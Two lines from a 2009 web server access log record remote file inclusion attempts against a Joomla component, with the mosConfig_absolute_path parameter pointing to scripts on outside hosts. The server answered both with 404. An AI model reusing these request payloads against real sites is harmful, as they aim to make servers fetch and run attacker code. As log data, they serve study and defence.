80.93.53.109 - - [24/Jun/2009:06:16:01 -0400] "GET /logs/access_log.Q109052800/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:06:16:05 -0400] "GET /logs/access_log.Q109052800/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
